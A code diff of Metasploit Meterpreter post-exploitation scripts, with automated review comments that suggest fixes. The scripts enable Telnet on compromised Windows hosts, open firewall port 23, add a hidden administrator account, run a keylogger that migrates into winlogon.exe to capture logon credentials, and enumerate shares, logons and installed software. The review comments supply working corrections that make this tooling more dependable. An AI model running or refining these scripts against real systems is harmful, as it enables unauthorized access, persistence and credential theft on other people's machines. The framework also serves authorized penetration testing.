diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb
index 79196b4c05..86b3ff9646 100644
--- a/scripts/meterpreter/gettelnet.rb
+++ b/scripts/meterpreter/gettelnet.rb
@@ -1,201 +1,212 @@ -#!/usr/bin/env ruby -# -#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista -#Windows 2008 and Windows XP targets using native windows commands. -#Provided by Carlos Perez at carlos_perez[at]darkoperator.com -#Verion: 0.1.1 +#!/usr/bin/env ruby +# +#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista +#Windows 2008 and Windows XP targets using native windows commands. +#Provided by Carlos Perez at carlos_perez[at]darkoperator.com +#Verion: 0.1.2 #Note: If the Telnet Server is not installed in Vista or win2k8 -# it will be installed. -################## Variable Declarations ################## - -session = client -@@exec_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help menu." ], - "-e" => [ false, "Enable Telnet Server only." ], - "-p" => [ true, "The Password of the user to add." ], - "-u" => [ true, "The Username of the user to add." ] - ) -def checkifinst(session) - r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - if d =~ (/TlntSvr/) - return true - end - - end - r.channel.close - r.close -end - -#------------------------------------------------------------------------------- -def winver(session) - stringtest = "" - verout = [] - r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) - while(d = r.channel.read) - stringtest << d - end - r.channel.close - r.close - - verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) - version = nil - if verout[0] == "6" - if verout[1] == "0" - version = "Windows Vista/Windows 2008" - elsif verout[1] == "1" - version = "Windpows 7" - end - elsif verout [0] == "5" - if verout[1] == "0" - version = "Windows 2000" - elsif verout[1] == "1" - version = "Windows XP" - elsif verout[1] == "2" - version = "Windows 2003" - end - end - version -end - 
-#--------------------------------------------------------------------------------------------------------- -def insttlntsrv(session) - trgtos = winver(session) +# it will be installed. +################## Variable Declarations ################## + +session = client +@@exec_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu." ], + "-e" => [ false, "Enable Telnet Server only." ], + "-p" => [ true, "The Password of the user to add." ], + "-u" => [ true, "The Username of the user to add." ] + ) +def checkifinst(session) + r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ (/TlntSvr/) + return true + end + + end + r.channel.close + r.close +end + +#------------------------------------------------------------------------------- +def winver(session) + stringtest = "" + verout = [] + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + stringtest << d + end + r.channel.close + r.close + + verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) + version = nil + if verout[0] == "6" + if verout[1] == "0" + version = "Windows Vista/Windows 2008" + elsif verout[1] == "1" + version = "Windpows 7" + end + elsif verout [0] == "5" + if verout[1] == "0" + version = "Windows 2000" + elsif verout[1] == "1" + version = "Windows XP" + elsif verout[1] == "2" + version = "Windows 2003" + end + end + version +end + +#--------------------------------------------------------------------------------------------------------- +def insttlntsrv(session) + trgtos = winver(session) if trgtos =~ /(Windows Vista)/ if checkifinst(session) print_status("Telnet Service Installed on Target") - else - print_status("Installing Telnet Server Service ......") - session.response_timeout=90 - r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) 
- tmpout << d - end - r.channel.close - r.close + else + print "[*] Installing Telnet Server Service ......") + session.response_timeout=90 + r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true}) + sleep(2) + prog2check = "pkgmgr.exe" + found = 0 + while found == 0 + session.sys.process.get_processes().each do |x| + found =1 + if prog2check == (x['name'].downcase) + print "." + sleep(0.5) + found = 0 + end + end end - end - end - -#--------------------------------------------------------------------------------------------------------- -def enabletlntsrv(session) - tmpout = [ ] - cmdout = [] - key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr" - root_key2, base_key2 = session.sys.registry.splitkey(key2) - value2 = "Start" - begin - open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ) - v2 = open_key.query_value(value2) - print_status "Setting Telnet Server Services service startup mode" - if v2.data != 2 - print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..." - cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ] - cmmds. 
each do |cmd| - r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - end - else - print_status "\tTelnet Server Services service is already set to auto" - end - #Enabling Exception on the Firewall - print_status "\tOpening port in local firewall if necessary" - r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - rescue::Exception => e - print_status("The following Error was encountered: #{e.class} #{e}") - end -end -#--------------------------------------------------------------------------------------------------------- -def addrdpusr(session, username, password) - tmpout = [ ] - cmdout = [] - print_status "Setting user account for logon" - print_status "\tAdding User: #{username} with Password: #{password}" - begin - r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - print_status "\tAdding User: #{username} to local group TelnetClients" - r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - print_status "\tAdding User: #{username} to local group Administrators" - r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) - while(d = r.channel.read) - tmpout << d - end - cmdout << tmpout - r.channel.close - r.close - print_status "You can now login with the created user" - rescue::Exception => e - print_status("The following Error was 
encountered: #{e.class} #{e}") - end -end -#--------------------------------------------------------------------------------------------------------- -def message - print_status "Windows Telnet Server Enabler Meterpreter Script" + r.channel.close + r.close + print_status("Finnished installing the Telnet Service.") + end + end + end + +#--------------------------------------------------------------------------------------------------------- +def enabletlntsrv(session) + tmpout = [ ] + cmdout = [] + key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr" + root_key2, base_key2 = session.sys.registry.splitkey(key2) + value2 = "Start" + begin + open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ) + v2 = open_key.query_value(value2) + print_status "Setting Telnet Server Services service startup mode" + if v2.data != 2 + print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..." + cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ] + cmmds. 
each do |cmd| + r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + end + else + print_status "\tTelnet Server Services service is already set to auto" + end + #Enabling Exception on the Firewall + print_status "\tOpening port in local firewall if necessary" + r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + rescue::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end +end +#--------------------------------------------------------------------------------------------------------- +def addrdpusr(session, username, password) + tmpout = [ ] + cmdout = [] + print_status "Setting user account for logon" + print_status "\tAdding User: #{username} with Password: #{password}" + begin + r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "\tAdding User: #{username} to local group TelnetClients" + r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "\tAdding User: #{username} to local group Administrators" + r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "You can now login with the created user" + rescue::Exception => e + print_status("The following Error was 
encountered: #{e.class} #{e}") + end +end +#--------------------------------------------------------------------------------------------------------- +def message + print_status "Windows Telnet Server Enabler Meterpreter Script" end def usage - print( - "Windows Telnet Server Enabler Meterpreter Script\n" + - "Usage: getgui -u -p \n" + - @@exec_opts.usage + print( + "Windows Telnet Server Enabler Meterpreter Script\n" + + "Usage: getgui -u -p \n" + + @@exec_opts.usage ) -end -################## MAIN ################## -# Parsing of Options -usr = nil -pass = nil -lport = nil -enbl = nil -@@exec_opts.parse(args) { |opt, idx, val| - case opt - when "-u" - usr = val - when "-p" - pass = val - when "-h" - usage - break - when "-n" - lport = val.to_i - when "-e" - enbl = 1 - end - -} -if enbl == 1 - message - insttlntsrv(session) - enabletlntsrv(session) - -elsif usr!= nil && pass != nil - message - insttlntsrv(session) - enabletlntsrv(session) - addrdpusr(session, usr, pass) - -else - usage -end - +end +################## MAIN ################## +# Parsing of Options +usr = nil +pass = nil +lport = nil +enbl = nil +@@exec_opts.parse(args) { |opt, idx, val| + case opt + when "-u" + usr = val + when "-p" + pass = val + when "-h" + usage + break + when "-n" + lport = val.to_i + when "-e" + enbl = 1 + end + +} +if enbl == 1 + message + insttlntsrv(session) + enabletlntsrv(session) + +elsif usr!= nil && pass != nil + message + insttlntsrv(session) + enabletlntsrv(session) + addrdpusr(session, usr, pass) + +else + usage +end + diff --git a/scripts/meterpreter/keylogrecorder.rb b/scripts/meterpreter/keylogrecorder.rb index ff81a66388..a2ef1fc82f 100755 --- a/scripts/meterpreter/keylogrecorder.rb +++ b/scripts/meterpreter/keylogrecorder.rb 
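Review bot: `print "[*] Installing Telnet Server Service ......")` in the new else-branch of insttlntsrv has an unmatched `)` — `print` is called without parentheses and the stray paren is a SyntaxError, so the whole script fails to load; the line should read `print_status("Installing Telnet Server Service ......")` like the status lines around it. The pkgmgr wait loop below it has no upper bound, and because `found` is only set to 1 inside the `each` block, an empty list from `get_processes` leaves `found == 0` and the loop never exits; `session.response_timeout=90` is also never restored afterwards. The same unbounded `while found == 0` polling is added to wmicexec in remotewinenum.rb (@@ -75) and winenum.rb (@@ -193), so a bounded wait helper would serve all three. A bounded version of the pkgmgr wait is sketched below; the rest of insttlntsrv is unchanged.
```ruby
          print_status("Installing Telnet Server Service ......")
          session.response_timeout=90
          r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
          sleep(2)
          # Poll for pkgmgr.exe to exit, but give up after a bounded number of checks so a
          # stuck installer cannot hang the script
          checks_left = 240
          running = true
          while running && checks_left > 0
            running = session.sys.process.get_processes().any? { |x| x['name'].downcase == "pkgmgr.exe" }
            if running
              print "."
              sleep(0.5)
              checks_left -= 1
            end
          end
          print_status("Timed out waiting for pkgmgr.exe to finish") if running
          # … unchanged: r.channel.close / r.close / final status message …
```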
@@ -34,21 +34,15 @@ captype = 0
 "-c" => [ true, "Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0."]
 )
+
 #Function to Migrate in to Explorer process to be able to interact with desktop
-def explrmigrate(session,captype)
+def explrmigrate(session,captype,adm)
 begin
 print_status("Migrating process...")
 if captype.to_i == 0
 process2mig = "explorer.exe"
 elsif captype.to_i == 1
- # Check to make sure that process is running and system to be able to migrate to high priv process
- if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
- process2mig = "winlogon.exe"
- else
- print_status("\tYou are not currently running as System to be able to migrate to winlogon.")
- print_status("\tCapturing only logon user keystrokes.")
- process2mig = "explorer.exe"
- end
+ process2mig = "winlogon.exe"
 else
 process2mig = "explorer.exe"
 end
@@ -70,8 +64,10 @@ end
 #Function for starting the keylogger
 def startkeylogger(session)
 begin
+ print_status("Grabbing Desktop Keyboard Input...")
+ session.ui.grab_desktop
 print_status("Starting the keystroke sniffer...")
- client.ui.keyscan_start
+ session.ui.keyscan_start
 return true
 rescue
 print_status("Failed to start Keylogging!")
@@ -125,8 +121,11 @@ def keycap(session, keytime, logfile)
 end
 db.close
 rescue::Exception => e
+ print("\n")
+ print_status("#{e.class} #{e}")
 db.close
- print_status("Error: #{e.class} #{e}")
+ print_status("Stopping keystroke sniffer...")
+ session.ui.keyscan_stop
 end
 end
 def helpmsg
@@ -155,7 +154,8 @@ helpcall = 0
 }
 if helpcall == 0
- if explrmigrate(session,captype)
+ adm = checkifadm(session)
+ if explrmigrate(session,captype,adm)
 if startkeylogger(session)
 keycap(session, keytime, logfile)
 end
diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb
index 5b01ea36d6..2981e04c28 100644
--- a/scripts/meterpreter/remotewinenum.rb
+++ b/scripts/meterpreter/remotewinenum.rb
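Review bot: The new `adm` parameter of explrmigrate is never read in the visible part of the function, while the removed SYSTEM check is replaced by an unconditional `process2mig = "winlogon.exe"`, so a captype-1 run from an unprivileged session now attempts a migration that fails later instead of falling back to explorer.exe with the old explanatory message. Assuming checkifadm returns a truthy value when the session has the required privilege, the fallback can be kept with `process2mig = adm ? "winlogon.exe" : "explorer.exe"` plus a `print_status` noting the downgrade. checkifadm is not defined in any hunk of this diff; if it is not defined elsewhere in the file, `adm = checkifadm(session)` at the call site raises NameError. In the @@ -125 hunk `session.ui.keyscan_stop` now runs inside the rescue clause, so a failure there propagates out of keycap after the original error has already been printed; a small `begin … rescue … end` around it keeps the cleanup best-effort. The body of explrmigrate continues past the end of the hunk.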
@@ -3,7 +3,7 @@
 #Meterpreter script for basic enumeration of Windows 2003, Windows Vista
 # and Windows XP remote targets using native windows command wmic.
 #Provided by Carlos Perez at carlos_perez[at]darkoperator.com
-#Verion: 0.1.1
+#Verion: 0.1.0
 #Note:
 ################## Variable Declarations ##################
 session = client
@@ -39,10 +39,17 @@ wmic = [
 'group list',
 'sysaccount list',
 'volume list brief',
+ 'logicaldisk get description,filesystem,name,size',
+ 'netlogin get name,lastlogon,badpasswordcount',
+ 'netclient list brief',
+ 'netuse get name,username,connectiontype,localname',
+ 'share get name,path',
+ 'nteventlog get path,filename,writeable',
 'service list brief',
 'process list brief',
 'startup list full',
 'rdtoggle list',
+ 'product get name,version',
 'qfe list'
 ]
 ################## Function Declarations ##################
@@ -75,7 +82,19 @@ def wmicexec(session,wmic,user,pass,trgt)
 sleep(1)
 #print_status "\twmic #{command}"
 r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
- sleep(2)
+ #Making sure that wmic finnishes before executing next wmic command
+ prog2check = "wmic.exe"
+ found = 0
+ sleep(2)
+ while found == 0
+ session.sys.process.get_processes().each do |x|
+ found =1
+ if prog2check == (x['name'].downcase)
+ sleep(0.5)
+ found = 0
+ end
+ end
+ end
 r.close
 end
 # Read the output file of the wmic commands
@@ -122,6 +141,9 @@ end
 def winver(session)
 stringtest = ""
 verout = []
+ tmp = session.fs.file.expand_path("%TEMP%")
+ wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
+
 r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
 while(d = r.channel.read)
 stringtest << d
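Review bot: `#Verion: 0.1.0` in the @@ -3 hunk moves the header version below the previous 0.1.1, which reads like an accidental revert rather than a bump. If an upward bump was intended, `#Verion: 0.1.2` would keep the history monotonic, matching what the gettelnet.rb header in this same commit moves to.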
@@ -133,7 +155,19 @@ def winver(session)
 version = nil
 if verout[0] == "6"
 if verout[1] == "0"
- version = "Windows Vista/Windows 2008"
+ r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
+ sleep(2)
+ # Read the output file of the wmic commands
+ r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
+ while(d = r.channel.read)
+ if d =~ /Windows Serverr 2008/
+ version = "Windows 2008"
+ elsif d =~ /Windows Vista/
+ version = "Windows Vista"
+ end
+ end
+ r.channel.close
+ r.close
 elsif verout[1] == "1"
 version = "Windpows 7"
 end
diff --git a/scripts/meterpreter/winenum.rb b/scripts/meterpreter/winenum.rb
index 1958a7f5dd..3e224f9dbf 100644
--- a/scripts/meterpreter/winenum.rb
+++ b/scripts/meterpreter/winenum.rb
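Review bot: The new Vista/2008 branch of winver relies on a fixed `sleep(2)` before `type`-ing the wmic output, whereas wmicexec in this same commit waits for wmic.exe to exit; on a slow host the `type` reads an empty file, neither regex matches and `version` stays nil, which the callers' string matching then treats as an unknown OS. The temp file `#{wmitmptxt}` is never removed, so each run leaves a random-named file in %TEMP% on the target, and the first `r` (the `/append` execute) is overwritten without `r.close`. `/Windows Serverr 2008/` only matches if the doubled r is deliberate (the ® in the product name as rendered by the console code page); a one-line comment saying so would stop the next reader "fixing" it. The same code is added to winver in winenum.rb (@@ -504 and @@ -515). A bounded wait and the cleanup are sketched below; the rest of winver is unchanged.
```ruby
      r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
      r.close
      # Wait for wmic.exe to exit instead of guessing with a fixed sleep; bounded so a
      # hung wmic cannot stall the script
      checks_left = 60
      while checks_left > 0 && session.sys.process.get_processes().any? { |x| x['name'].downcase == "wmic.exe" }
        sleep(0.5)
        checks_left -= 1
      end
      r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
      # … unchanged: channel read loop and the 2008 / Vista matching …
      r.channel.close
      r.close
      # Remove the temp file so no artifact is left in %TEMP%
      r = session.sys.process.execute("cmd.exe /c del #{wmitmptxt}", nil, {'Hidden' => 'true'})
      r.close
```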
@@ -1,20 +1,21 @@
 #!/usr/bin/env ruby
 #
 #Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
-# and Windows XP targets using native windows commands.
+#Windows 7 and Windows XP targets using native windows commands.
 #Provided by Carlos Perez at carlos_perez[at]darkoperator.com
-#Verion: 0.3.4
+#Verion: 0.3.5
 #Note: Compleatly re-writen to make it modular and better error handling.
 # Working on adding more Virtual Machine Checks and looking at improving
 # the code but retain the independance of each module so it is easier for
 # the code to be re-used.
 #Contributor: natron (natron 0x40 invisibledenizen 0x2E com) (Process Migration Functions)
+# inquis (bernardo.damele 0x40 gmail 0x2E com) (Minor Fixes)
 ################## Variable Declarations ##################
 session = client
 host,port = session.tunnel_peer.split(':')
 # Create Filename info to be appended to downloaded files
-filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000))
+filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000))
 # Create a directory for the logs
 logs = ::File.join(Msf::Config.config_directory, 'logs', 'winenum', host + filenameinfo )
@@ -47,8 +48,12 @@ commands = [
 'net group administrators',
 'net view /domain',
 'netsh firewall show config',
- 'tasklist /svc'
-
+ 'tasklist /svc',
+ 'tasklist /m'
+]
+# Windows 2008 Commands
+win2k8cmd = [
+ 'oclist',
 ]
 # Commands wich MACE will be changed
 cmdstomp = [
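Review bot: The new `filenameinfo` line keeps `strftime("%Y%m%d.%M%S")`, which has no hour field (`%H`), so two runs an hour apart differ only in the random 5-digit suffix; if that is unintended, `"%Y%m%d.%H%M%S"` gives a complete timestamp. In the @@ -47 hunk `win2k8cmd = [ 'oclist', ]` is defined but not referenced by any hunk of this diff; if it is also unused in the rest of the file, either wire it into the OS dispatch at the bottom of the script or drop it. The file outside these hunks is not visible here, so both points are conditional.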
@@ -65,14 +70,21 @@ cmdstomp = [
 ]
 # WMIC Commands that will be executed on the Target
 wmic = [
- 'computersystem list',
+ 'computersystem list brief',
 'useraccount list',
 'group list',
 'service list brief',
 'volume list brief',
+ 'logicaldisk get description,filesystem,name,size',
+ 'netlogin get name,lastlogon,badpasswordcount',
+ 'netclient list brief',
+ 'netuse get name,username,connectiontype,localname',
+ 'share get name,path',
+ 'nteventlog get path,filename,writeable',
 'process list brief',
 'startup list full',
 'rdtoggle list',
+ 'product get name,version',
 'qfe',
 ]
 #Specific Commands for Windows vista for Wireless Enumeration
@@ -184,7 +196,7 @@ def wmicexec(session,wmiccmds= nil)
 tmp = session.fs.file.expand_path("%TEMP%")
 wmicfl = tmp + "\\wmictmp.txt"
 wmiccmds.each do |wmi|
- print_status "\trunning command wimic #{wmi}"
+ print_status "\trunning command wmic #{wmi}"
 r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
 sleep(1)
 r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} >> #{wmicfl}",nil, {'Hidden' => 'true'})
@@ -193,6 +205,18 @@ def wmicexec(session,wmiccmds= nil)
 sleep(1)
 r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
 sleep(2)
+ #Making sure that wmic finnishes before executing next wmic command
+ prog2check = "wmic.exe"
+ found = 0
+ while found == 0
+ session.sys.process.get_processes().each do |x|
+ found =1
+ if prog2check == (x['name'].downcase)
+ sleep(0.5)
+ found = 0
+ end
+ end
+ end
 r.close
 end
 # Read the output file of the wmic commands
@@ -364,6 +388,22 @@ def regdump(session,pathoflogs,filename)
 session.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'})
 end
+#-------------------------------------------------------------------------------
+# Function for extracting program list from registry
+def findprogs(session)
+ print_status("Extracting software list from registry")
+ proglist = ""
+ session.sys.registry.create_key(HKEY_CURRENT_USER, 'Software').each_key() do |company|
+ proglist << "#{company}"
+
+ session.sys.registry.create_key(HKEY_CURRENT_USER, "Software\\#{company}").each_key() do |software|
+ proglist << "\t#{software}"
+ end
+ end
+ print_status("Finnished Extraction of software list from registry")
+ proglist
+end
+
 #-------------------------------------------------------------------------------
 # Function that will call 2 other Functions to cover all tracks
 def covertracks(session,cmdstomp)
@@ -504,6 +544,9 @@ end
 def winver(session)
 stringtest = ""
 verout = []
+ tmp = session.fs.file.expand_path("%TEMP%")
+ wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
+
 r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
 while(d = r.channel.read)
 stringtest << d
@@ -515,9 +558,21 @@ def winver(session)
 version = nil
 if verout[0] == "6"
 if verout[1] == "0"
- version = "Windows Vista/Windows 2008"
+ r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
+ sleep(2)
+ # Read the output file of the wmic commands
+ r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
+ while(d = r.channel.read)
+ if d =~ /Windows Serverr 2008/
+ version = "Windows 2008"
+ elsif d =~ /Windows Vista/
+ version = "Windows Vista"
+ end
+ end
+ r.channel.close
+ r.close
 elsif verout[1] == "1"
- version = "Windpows 7"
+ version = "Windows 7"
 end
 elsif verout [0] == "5"
 if verout[1] == "0"
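Review bot: findprogs enumerates HKCU\Software with `session.sys.registry.create_key(...)`, which creates the key when it is absent and needs write access although the function only reads; `open_key(HKEY_CURRENT_USER, 'Software', KEY_READ)` — the call shape enabletlntsrv in gettelnet.rb uses in this same diff — is the read-only equivalent. `proglist << "#{company}"` and `proglist << "\t#{software}"` append no line terminator, so the returned string runs every vendor and product together on one line once it is written to the log. The opened keys are never closed; presumably the handles stay open on the target until the session ends. The rewrite below addresses all three; the two print_status messages are unchanged.
```ruby
def findprogs(session)
  print_status("Extracting software list from registry")
  proglist = ""
  # Open read-only: create_key would create the key (and needs write access) when it is absent
  softkey = session.sys.registry.open_key(HKEY_CURRENT_USER, 'Software', KEY_READ)
  softkey.each_key() do |company|
    proglist << "#{company}\n"
    compkey = session.sys.registry.open_key(HKEY_CURRENT_USER, "Software\\#{company}", KEY_READ)
    compkey.each_key() do |software|
      proglist << "\t#{software}\n"
    end
    compkey.close
  end
  softkey.close
  print_status("Finnished Extraction of software list from registry")
  proglist
end
```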
@@ -588,13 +643,20 @@ if helpopt != 1
 if trgtos =~ /(Windows XP)/
 filewrt(dest,list_exec(session,commands))
 filewrt(dest,wmicexec(session,wmic))
+ filewrt(dest,findprogs(session))
 dumpwlankeys(session,logs,filenameinfo)
- elsif trgtos =~ /(Windows .NET Server)/
+ elsif trgtos =~ /(Windows 2003)/
 filewrt(dest,list_exec(session,commands))
 filewrt(dest,wmicexec(session,wmic))
+ filewrt(dest,findprogs(session))
 elsif trgtos =~ /(Windows Vista)/
 filewrt(dest,list_exec(session,commands + vstwlancmd))
 filewrt(dest,wmicexec(session,wmic))
+ filewrt(dest,findprogs(session))
+ elsif trgtos =~ /(Windows 7)/
+ filewrt(dest,list_exec(session,commands + vstwlancmd))
+ filewrt(dest,wmicexec(session,wmic))
+ dumpwlankeys(session,logs,filenameinfo)
 dumpwlankeys(session,logs,filenameinfo)
 elsif trgtos =~ /(Windows 2000)/
 filewrt(dest,list_exec(session,commands - nonwin2kcmd))
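Review bot: The new `elsif trgtos =~ /(Windows 7)/` branch is inserted before the Vista branch's existing `dumpwlankeys(session,logs,filenameinfo)` context line, so that call now belongs to the Windows 7 branch: Vista no longer dumps wireless keys and Windows 7 calls dumpwlankeys twice, and the Windows 7 branch also lacks the `filewrt(dest,findprogs(session))` every other branch in the hunk gained. Independently, winver in this commit (@@ -515) now returns "Windows 2008" instead of "Windows Vista/Windows 2008", so 2008 targets no longer match the Vista branch; no branch in this hunk matches them, and if none exists past the hunk they fall through to the final else (the if-chain continues beyond the end of the hunk). The Vista and Windows 7 branches as they should read are below; the XP, 2003 and 2000 branches are unchanged.
```ruby
    elsif trgtos =~ /(Windows Vista)/
      filewrt(dest,list_exec(session,commands + vstwlancmd))
      filewrt(dest,wmicexec(session,wmic))
      filewrt(dest,findprogs(session))
      dumpwlankeys(session,logs,filenameinfo)
    elsif trgtos =~ /(Windows 7)/
      filewrt(dest,list_exec(session,commands + vstwlancmd))
      filewrt(dest,wmicexec(session,wmic))
      filewrt(dest,findprogs(session))
      dumpwlankeys(session,logs,filenameinfo)
    # … unchanged: elsif trgtos =~ /(Windows 2000)/ branch …
```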